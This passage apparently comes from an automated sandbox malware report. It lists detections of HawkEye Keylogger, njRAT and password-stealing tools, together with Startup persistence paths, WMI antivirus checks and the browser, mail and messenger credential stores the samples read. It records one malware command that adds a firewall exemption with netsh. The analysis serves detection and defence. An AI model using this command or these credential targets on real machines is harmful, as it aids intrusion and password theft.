Source: C:\Users\user\AppData\Roaming\servieda.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
AV process strings found (often used to terminate AV products)
Source: tmp87E4.tmp.exe, 0000000C.00000003.516960849.000000000506E000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
Yara detected MailPassView
Source: Yara match File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1428, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4027e00.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Yara detected Njrat
Source: Yara match File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 14_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 14_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 14_2_004033D7
Yara detected WebBrowserPassView password recovery tool
Source: Yara match File source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 5824, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4040020.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.4040020.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

barindex
Detected HawkEye Rat
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEyeKeylogger
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp String found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp String found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger | Execution Confirmed |
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger | Stealer Records |
Source: tmpFB21.tmp.exe.2.dr String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Detected njRat
Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs .Net Code: njRat config detected
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs .Net Code: njRat config detected
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs .Net Code: njRat config detected
Yara detected HawkEye Keylogger
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE
Yara detected Njrat
Source: Yara match File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
